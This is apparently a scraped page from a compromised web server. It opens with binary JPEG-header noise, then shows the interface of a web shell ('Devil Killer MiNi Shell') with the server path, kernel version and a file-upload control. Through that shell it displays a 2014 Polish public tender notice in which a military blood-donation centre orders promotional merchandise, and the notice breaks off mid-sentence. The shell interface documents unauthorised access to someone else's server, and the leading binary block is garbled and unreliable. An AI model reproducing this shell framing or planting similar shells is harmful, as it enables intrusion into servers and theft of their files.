JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140627/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140627/216408-N-2014.html

<p class="kh_header"><b>Warszawa: Dostawa materiałów reklamowych</b><br>
<b>Numer ogłoszenia: 216408 - 2014; data zamieszczenia: 27.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa SP ZOZ , ul. Koszykowa 78, 00-671 Warszawa, woj. mazowieckie, tel. 022 6 845 557, faks 022 6 845 135.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wckik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów reklamowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet Nr 1: 
poz. 1. Koszulka - t - shirt - 4600 sztuk; 
poz. 2. Koszulka - polo - 400 sztuk. 
Pakiet Nr 2: 
poz. 1. Antystres - 2000 sztuk; 
poz. 2. Brelok dla dawców - 2500 sztuk; 
poz. 3. Czapka z daszkiem - 1000 sztuk; 
poz. 4. Długopis dla dawców strzykawka - 3000 sztuk; 
poz. 5. Długopis - 3000 sztuk; 
poz. 6. Kubek - 950 sztuk; 
poz. 7. Maskotka - 550 sztuk; 
poz. 8. Parasol automatyczny - 300 sztuk; 
poz. 9. Pendrive - 200 sztuk; 
poz. 10. Plecak - 500 sztuk; 
poz. 11. Ryngraf z etui - 40 sztuk; 
poz. 12. Smycz - 2100 sztuk; 
poz. 13. Torba sportowa z logo - 200 sztuk; 
poz. 14. Zestaw pierwszej pomocy - 100 sztuk; 
poz. 15. Zestaw piśmienniczy - 50 sztuk. 
Wykonawca wraz z ofertą dostarczy próbkę oferowanego przedmiotu dla pozycji nr 1, 2, 3, 4, 5, 6, 7, 8, 10, 11, 13, 14. 
Pakiet Nr 3: 
Bombka świąteczna - 100 sztuk. 
Pakiet Nr 4: 
Słodycze reklamowe - 150 kg. 
Wykonawca wraz z ofertą dostarczy próbkę oferowanego przedmiotu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6, 18.93.11.00-5, 18.93.20.00-1, 15.84.23.10-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w razie zaistnienia okoliczności:
1. w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, szczególnie zagrażające bezpośrednio życiu lub zdrowiu ludzi lub grożące powstaniem szkody niewspółmiernie większej niż spowodowana działaniem lub zaniechaniem;
2. zaistnienie sytuacji pozwalającej na obniżenie kosztów realizacji zamówienia;
3. wystąpienia innych szczególnych okoliczności, za które Wykonawca nie jest odpowiedzialny;
4. zmiana w zakresie przedmiotu zamówienia w przypadku wystąpienia okoliczności, których nie dało się przewidzieć w chwili podpisania umowy, niezależnych od wykonawcy;
5. zmiana terminu realizacji umowy w przypadku wystąpienia okoliczności nieleżących po stronie wykonawcy;
6. ustawowej zmiany stawki podatku od towarów i usług VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wckik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa; 
Samodzielny Publiczny Zakład Opieki Zdrowotnej; 
ul. Koszykowa 78; 
00-671 Warszawa..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2014 godzina 09:00, miejsce: Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa; 
Samodzielny Publiczny Zakład Opieki Zdrowotnej; 
ul. Koszykowa 78; 
00-671 Warszawa; 
Kancelaria ogólna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Koszulki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poz. 1. Koszulka - t - shirt - 4600 sztuk. 
Koszulka - t - shirt barwienie reaktywne, ściągacz ze spandeksu, bez szwów bocznych, podwójne przeszycia na rękawach i na dole koszulki. Kolory koszulek jednolite koloru czarnego. Materiał bawełna, gramatura: 170-190g/m2. Nadruk na koszulkę - sitodruk, nadruk odporny na środki piorące. Na wysokości klatki piersiowej z lewej strony logo WCKiK zgodnie z załącznikiem Nr A i treść adresu internetowego www.wckik.pl, rozmiary logo - długość 7, 5 cm, szerokość 8,5 cm. (+/-10%).Każda koszulka pakowana osobno. Projekt graficzny będzie wykonany przez Wykonawcę wg wzoru Zamawiającego i przedstawiony do akceptacji Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Rozmiary koszulki S-400 szt., M-1400 szt., L- 1400 szt.; XL-1000 szt., XXL-400 szt.
Poz. 2. Koszulka - polo - 400 sztuk. 
Koszulka - polo w kolorze czerwonym, 165-180 gram, 100% wysokogatunkowej bawełny, tradycyjny kołnierz zapinany na guziki w kolorze dzianiny, materiał niekurczliwy, luźne mankiety oraz dolny brzeg obszyty podwójnym ściegiem, 60 % koszulek wykonanych krojem dla kobiet, rozmiary koszulek: M - 100, L-100, XL-30 oraz krojem dla mężczyzn M-50, L-50, XL-45, XXL -25 Z przodu koszulki na wysokości prawej piersi logo zgodnie z załącznikiem nr A, z tyłu koszulki biały haft: WOJSKOWE CENTRUM KRWIODAWSTWA i KRWIOLECZNICTWA, na rękawie adres strony internetowej: www.wckik.pl, rozmiary logo - długość 5 cm, szerokość 5 cm. (+/- 10%). Każda koszulka pakowana osobno. Projekt graficzny będzie wykonany przez Wykonawcę wg wzoru Zamawiającego i przedstawiony do akceptacji. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Różne materiały reklamowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> poz. 1. Antystres - 2000 sztuk. 
Antystres dla dawców: w kształcie kropelki  krwi w kształcie postaci z buźką i rączkami, wysokość 110 mm, w kolorze czerwonym, (+/- 10%) materiał poliuretan znakowanie 1 kolor/1 miejsce, metoda znakowania tampodruk, nadruk w kolorze białym: www.wckik.pl znajdujący się na czarnej postawie krwinki - zgodnie z Załącznikiem D. Wielkość nadruku 0,5cmx4cm. (+/-10%). Projekt graficzny będzie wykonany przez Wykonawcę i przedstawiony do akceptacji Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. 
poz. 2. Brelok dla dawców - 2500 sztuk. 
Brelok będący eleganckim połączeniem metalu i eko - skóry zgodnie z załącznikiem F. Każdy brelok zapakowany w czarne kartonowe opakowanie upominkowe. Logo na breloku umieszczone techniką grawerki laserowej. Wymiary produktu: 65.0mm x 20.0mm (+/-10%) Podstawowy materiał wykonania: metal, dodatkowy materiał wykonania: eko-skóra w kolorze czarnym. Wykonawca zobowiązuje się do przedstawienia 3 rodzajów breloków, z których Zamawiający wybierze 1 rodzaj. Projekt graficzny będzie wykonany przez Wykonawcę i przedstawiony do akceptacji przez Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego.
poz. 3. Czapka z daszkiem - 1000 sztuk. 
Czapka z daszkiem - 6-cio panelowa typu sandwich o grubym ściegu, koloru czarnego czapka baseballowa z obszytymi wywietrznikami w kolorze czapki oraz wstawką w daszku w kolorze białym. Czapka z regulacją obwodu za pomocą metalowej sprzączki. Specyfikacja:100% bawełny, technika zdobienia haft, miejsce zdobienia tył czapki zgodnie z Załącznikiem J (napis www.wckik.pl w kolorze białym). Wykonawca zobowiązuje się do przedstawienia 5 rodzajów czapek, z których Zamawiający wybierze maksymalnie 2 rodzaje. Na wybranym rodzaju czapki Wykonawca wykona próbny haft. Każda czapka opakowana w przezroczysty plastik. Projekt graficzny zostanie przygotowany przez Wykonawcę i zatwierdzony przez Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego.  poz. 4. Długopis dla dawców strzykawka - 3000 sztuk. 
Długopis w kształcie strzykawki zgodny z załącznikiem C o wymiarach 1,10 cm x 12,70 cm z nadrukowaną nazwą Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa oraz adresem strony internetowej www.wckik.pl - napis w kolorze czarnym wykonany w sposób zapewniający trwałość podczas użytkowania. Wkład kolor niebieski, środek strzykawki wypełniony czerwoną cieczą imitującą krew, nieszkodliwą dla zdrowia i życia w przypadku uszkodzenia i kontaktu ze skórą człowieka. Użyta ciecz nie może wysychać ani wyparowywać. Długopis musi być wykonany z takiego materiału, aby nie ulegał zepsuciu podczas użytkowania. Projekt graficzny będzie wykonany przez Wykonawcę i przedstawiony do akceptacji Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. 
poz. 5. Długopis - 3000 sztuk. 
długopis/rysik średnica uchwytu 0,9cm, 13,3 cm długości (+/-10%), długopis z końcówką do ekranów dotykowych z przekręcanym mechanizmem. Koloru czerwonego, logo i napis www.wckik.pl - umieszczone na części czerwonej długopisu zgodnie z załącznikiem A metodą tampodruku 50x5mm (+/-10%) Długopis wykonany w sposób zapewniający trwałość podczas użytkowania: Wkład kolor: niebieski. Projekt graficzny będzie wykonany przez Wykonawcę wg wzoru Zamawiającego Załącznik Nr G i przedstawiony do akceptacji. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. 
poz. 6. Kubek - 950 sztuk. 
Kubek porcelanowy lub inny materiał mający zbliżone właściwości do porcelany. Wysokość: 11,3 mm, Średnica góra 90 mm, dół 5,9 mm. Dopuszczalne odchylenie od wymiarów 5 mm. Pojemność min. 250 ml. Możliwość zmywania w zmywarce. Wykończenie błysk, kolory kubka: czerwony w środku, biały na zewnątrz: dolna część oraz ucho wygodne do trzymania, w kolorze białym. Na kubku musi być logo i napis: 10 lat WOJSKOWEGO CENTRUM KRWIODAWSTWA i KRWIOLECZNICTWA SPZOZ, na części dolnej 1,5 cm od dołu kubka napis www.wckik.pl zgodnie z załącznikiem Nr H, po przeciwnej części kubka postać krwinki, wg. załącznika E1. Każdy kubek pakowany osobno w karton. Projekt graficzny będzie wykonany przez Wykonawcę wg wytycznych Zamawiającego i przedstawiony do akceptacji. Wykonanie nastąpi po akceptacji przez Zamawiającego. 
poz. 7. Maskotka - 550 sztuk. 
Maskotka: opracowanie, produkcja i dostawa maskotki reklamowej: misia pluszowego w koszulce. Wysokość 15 cm (+/-) 10%. Na koszulce nadruk krwinki zgodnej z załącznikiem E1, poniżej adres strony www.wckik.pl zgodnie z załącznikiem E. Maskotka powinna być atrakcyjnym i rozpoznawalnym symbolem, budzącym pozytywne emocje. Wykonawca zobowiązuje się do przedstawienia 4 rodzajów maskotek, z których Zamawiający wybierze maksymalnie 2 rodzaje. Na wybranym rodzaju maskotki Wykonawca wykona próbny druk. Projekt graficzny będzie wykonany przez Wykonawcę i przedstawiony do akceptacji przez Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. 
poz. 8. Parasol automatyczny - 300 sztuk. 
Parasol automatyczny, druk 4+0 CMYK, Parasol reklamowy z 8 panelami. Wysokość: min. 90 cm Średnica czaszy: min 100cm. Druty: metalowe (nie łamią się przy składaniu i rozkładaniu), kij: metalowy w kolorze czarnym, rączka: PVC w kolorze czarnym. Materiał czasza z grubego polyestru Otwieranie/zamykanie: automatyczne/ręczne Ilość paneli: 8, kolor czerwony, nadruk centralnie na jednym panelu logo WCKiK załącznikiem A, ok. 2cm pod logo - adres strony internetowej www.wckik.pl w kolorze białym umieszczony 5 cm od krawędzi panelu załącznik Nr B. Wykonawca zobowiązuje się do przedstawienia 5 rodzajów parasoli, z których Zamawiający wybierze maksymalnie 2 rodzaje. Na wybranym rodzaju parasola Wykonawca wykona logotypy projektu. Każdy parasol pakowany w etui wykonane z przezroczystego plastiku. Projekt graficzny zostanie przygotowany przez Wykonawcę i zatwierdzony przez Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. 
poz. 9. Pendrive - 200 sztuk. 
Pendrive - Pamięć USB o pojemności 8 GB, obudowa plastik-aluminium kolory: biały i czerwony, logo na obudowie wg. załącznika I, znakowanie tampodruk. Każdy pendrive z uchwytem do zaczepienia (np. na smyczy) zapakowany osobno w pudełko. Projekt graficzny będzie wykonany przez Wykonawcę i przedstawiony do akceptacji Zamawiającego. Wykonanie nastąpi po akceptacji przez Zamawiającego. 
poz. 10. Plecak - 500 sztuk. 
Plecak - główna przegroda zamykana na zamek. W kieszeni na froncie organizer, po obu bokach siatkowe kieszenie, dekoracyjna linka przy suwaku. Regulowane, miękkie ramiączka. Rozmiar 29x18x42 cm (+/- 10%) w kolorze - czarno-szarym. Materiał Poliester 600D oraz non woven polipropylen. Metoda nadruku: sitodruk. Na torbie przy zamkach zawieszki, nadruk logo WCKiK zgodnie z załącznikiem Nr A. Projekt graficzny zostanie przygotowany przez Wykonawcę i zatwierdzony przez Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. 
poz. 11. Ryngraf z etui - 40 sztuk. 
Ryngraf z etui. Podkład deski wykonany z drewna w kolorze mahoń, struktura gładka. Próbki drewna przesłana do akceptacji Zamawiającego. Wymiar(+/- 10%), wys. 17,5 cm, szerokość 14,5 cm, grubość 1,6 cm. Z tyłu podkładu otwór do mocowania na ścianie. Na podkładzie wykonany z metalu w kształcie wstęgi i przytwierdzony trwale napis WOJSKOWE CENTRUM KRWIODAWSTWA i KRWIOLECZNICTWA SPZOZ, pod wstęgą centralnie na ryngrafie kolorowe logo zgodne z załącznikiem Nr A w proporcjach 1/3 wielkości deski. Każdy ryngraf pakowany w karton. Wierzch etui z tworzywa introligatorskiego narożniki z metalu. W środku materiałowa wyściółka. Kolor etui zostanie wybrany po przedstawieniu przez Wykonawcę 5 wzorów. Wykonanie ryngrafu nastąpi po całkowitej akceptacji przez Zamawiającego. Projekt graficzny będzie wykonany przez Wykonawcę wg wzoru Zamawiającego i przedstawiony do akceptacji Zamawiającego. Wykonanie etui nastąpi po całkowitej akceptacji przez Zamawiającego. 
poz. 12. Smycz - 2100 sztuk. 
Smycz - szerokość ok. 15 mm długość po złożeniu ok. 450 mm. Smycz wykonana metodą sublimacji. Materiał płaski poliestrowy. Zakończenie smyczy: karabińczyk, zawieszka do telefonu ( na metalowym kółku zawieszonym na ramieniu karabińczyka). Nadruk dwustronny. Tło czerwone -Pantone 186 C. Wielkość nadruku dostosowana do pola zadruku, zapewniająca czytelność znaków. Znakowanie: logo WCKiK zgodnie z załącznikiem A, adres strony w kolorze białym: www.wckik.pl. Projekt graficzny zostanie przygotowany przez Wykonawcę i zatwierdzony przez Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. 
poz. 13. Torba sportowa z logo - 200 sztuk. 
Torba sportowa z kieszenią główną zamykaną na zamek błyskawiczny z dwoma suwakami, kieszeń z przodu, przedział na buty, kieszenie boczne oraz kieszeń tylna z zamkami, uchwyty do noszenia, regulowany i odpinany pasek na ramię z miękką podkładką - wymiar: ok. 70 x 28,5 x 28 cm. Zamawiający dopuszcza zmianę podanych wymiarów w granicach +/- 10%, materiał: Polyester, kolor: Zamawiający dopuszcza różne kolory bądź jeden kolor - do akceptacji Zamawiającego, nadruk na zewnętrznej stronie produktu, rozmiar nadruku musi być dostrzegalny tak, by oznaczenie: logotypu zgodne z Załącznikiem A i adresu strony www.wckik.pl były widoczne dla odbiorców. Projekt graficzny zostanie przygotowany przez Wykonawcę i zatwierdzony przez Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. Każda torba opakowana w przezroczysty plastik. 
poz. 14. Zestaw pierwszej pomocy - 100 sztuk. 
W etui z poliestru z karabinkiem w kolorze czerwonym. W komplecie 1 para nożyczek, mokre chusteczki, bandaż gazowy, 3 patyczki z wacikami, 5 samoprzylepnych plastrów. Wymiary 10x7x2 cm (+/-10%). Nadruk logo zgodnie z załącznikiem A centralnie na przodzie etui, poniżej nazwa Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa. Metoda-sitodruk. Napis w kolorze białym dostosowany do pola zadruku- zapewniająca czytelność znaków. Projekt graficzny zostanie przygotowany przez Wykonawcę i zatwierdzony przez Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. 
poz. 15. Zestaw piśmienniczy - 50 sztuk. 
Elegancki zestaw składający się z: długopisu, portfela z imitacji skóry (w kolorze czarnym) oraz breloku. Długopis z wkładem niebieskim, grawer na długopisie i breloku- logotyp zgodny z załącznikiem A oraz adresem strony www.wckik.pl. Całość opakowana w czarne pudełko. Projekt graficzny zostanie przygotowany przez Wykonawcę i zatwierdzony przez Zamawiającego. Wykonanie nastąpi po całkowitej akceptacji przez Zamawiającego. 
Wykonawca wraz z ofertą dostarczy próbkę oferowanego przedmiotu dla pozycji nr 1, 2, 3, 4, 5, 6, 7, 8, 10, 11, 13, 14..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6, 18.93.11.00-5, 18.93.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Bombka świąteczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bombka świąteczna - 100 sztuk. 
Bombka świąteczna - średnica 12 cm, kolorze czerwonym matowym, z nadrukiem jednostronnym metodą tampodruku. Po jednej stronie nadruk logo WCKiK zgodnie z załącznikiem A, poniżej nadruk napisu Wesołych Świąt i Szczęśliwego Nowego Roku w kolorze złotym. Pod drugiej stronie bombki kolorowy motyw świąteczny. Stojak do bombki z drutu metalowego w kolorze złotym o średnicy 3 mm w kształcie półokręgu z wygiętym u góry uchwytem na bombkę w kształcie haczyka i wygięty w kształcie okręgu jako podstawa stojaka. Każda bombka opakowana osobno w pudełko kartonowe w kolorze białym 13,5cmx13,5 cmx18,5 cm . Na jednej stronie na dole pudełka napis  w kolorze zielonym adresu strony internetowej www.wckik.pl. Pudełko umożliwiające schowanie bombki wraz ze stojakiem i unieruchomienie jej. W pudełku w czterech 